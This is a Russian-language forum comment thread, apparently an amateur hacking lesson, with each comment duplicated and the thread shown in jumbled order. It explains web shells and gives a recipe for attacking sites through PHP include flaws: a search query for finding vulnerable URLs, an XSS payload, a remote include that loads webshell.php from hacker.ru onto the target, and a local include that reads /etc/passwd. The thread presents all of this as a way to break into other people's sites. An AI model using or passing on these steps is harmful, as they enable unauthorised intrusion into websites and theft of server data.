Комментарии:
Jvk35 8 Янв 2014
Novichok, Шелл-Это файловый менеджер через который можно управлять папкамы и файламы.Обычно использують шелл который весит 16-17 кб.Открый все файлы php которые весять примерно так.
______________________
AptEntity96
Novichok, Шелл-Это файловый менеджер через который можно управлять папкамы и файламы.Обычно использують шелл который весит 16-17 кб.Открый все файлы php которые весять примерно так.
______________________
AptEntity96
OligarX 8 Янв 2014
Вот, опять же попробуй
поискать php include. Советую
воспользоваться google:
Inurl:page=
Такой запрос покажет нам
сайты, в урле которых
присутствует строка page=.
Далее попробуй подставить
любой набор символов в
параметр page. Если появиться
ошибка, значит скрипт уязвим
Кстати если найдешь php
инклуд, то можно получить xss
вот так:
www.site.ru?page=[sсriрt]alert(/
xss/)[/sсriрt]
Это работает во многих
случаях.
В следующем уроке я расскажу
о том: почему происходит php
include, что такое null byte и
трудности при чтении файлов.
Вот, опять же попробуй
поискать php include. Советую
воспользоваться google:
Inurl:page=
Такой запрос покажет нам
сайты, в урле которых
присутствует строка page=.
Далее попробуй подставить
любой набор символов в
параметр page. Если появиться
ошибка, значит скрипт уязвим
Кстати если найдешь php
инклуд, то можно получить xss
вот так:
www.site.ru?page=[sсriрt]alert(/
xss/)[/sсriрt]
Это работает во многих
случаях.
В следующем уроке я расскажу
о том: почему происходит php
include, что такое null byte и
трудности при чтении файлов.
OligarX 8 Янв 2014
Например, так:
www .site.ru?
page=http:/
hacker.ru/
webshell.php
Так мы пробуем загрузить веб
шелл на сайт.
Если мы увидим результат
работы webshell.php значит
нам круто повезло. И можно
считать, что сайт взломан.
Это называется удаленный
инклуд. Удаленный потому что
нам удалось загрузить скрипт с
другого сервера.
Кроме удаленных, инклуды
бывают локальные.
В этом случае мы сможем
только читать файлы на
сервере.
Например, сейчас мы
попробуем прочитать файл с
именами пользователей
системы:
www .site.ru?
page=/etc/passwd
Например, так:
www .site.ru?
page=http:/
hacker.ru/
webshell.php
Так мы пробуем загрузить веб
шелл на сайт.
Если мы увидим результат
работы webshell.php значит
нам круто повезло. И можно
считать, что сайт взломан.
Это называется удаленный
инклуд. Удаленный потому что
нам удалось загрузить скрипт с
другого сервера.
Кроме удаленных, инклуды
бывают локальные.
В этом случае мы сможем
только читать файлы на
сервере.
Например, сейчас мы
попробуем прочитать файл с
именами пользователей
системы:
www .site.ru?
page=/etc/passwd
OligarX 8 Янв 2014
Введение в PHP include.
Если мы найден такую
уязвимость то сможем либо
читать файлы на сервере либо
загрузить вебшелл.
Разберем сначала, что такое
веб шелл.
Веб шелл это php скрипт. C
помощью него мы сможем
изменять файлы сайта или
выполнять команды в системе.
В общем, шелл заменяет
административную панель.
Собственно цель большинства
взломов залить веб шелл.
Какими способами? PHP include
один из них. Итак, давайте
поверхностно разберем
уязвимость
Видим на сайте такой url:
www .site.ru?
page=home.html
Это значит, что на страничку
подгружается файл home.html
А что если попробовать
подгузить свой файл?
Введение в PHP include.
Если мы найден такую
уязвимость то сможем либо
читать файлы на сервере либо
загрузить вебшелл.
Разберем сначала, что такое
веб шелл.
Веб шелл это php скрипт. C
помощью него мы сможем
изменять файлы сайта или
выполнять команды в системе.
В общем, шелл заменяет
административную панель.
Собственно цель большинства
взломов залить веб шелл.
Какими способами? PHP include
один из них. Итак, давайте
поверхностно разберем
уязвимость
Видим на сайте такой url:
www .site.ru?
page=home.html
Это значит, что на страничку
подгружается файл home.html
А что если попробовать
подгузить свой файл?
Бастион 8 Янв 2014
Ivanyawa (8 Янв 2014):
Novichok, это форма, через которую заходят в панель управления твоим сайтом.
Ivanyawa, да, скажи как выглядитNovichok, это форма, через которую заходят в панель управления твоим сайтом.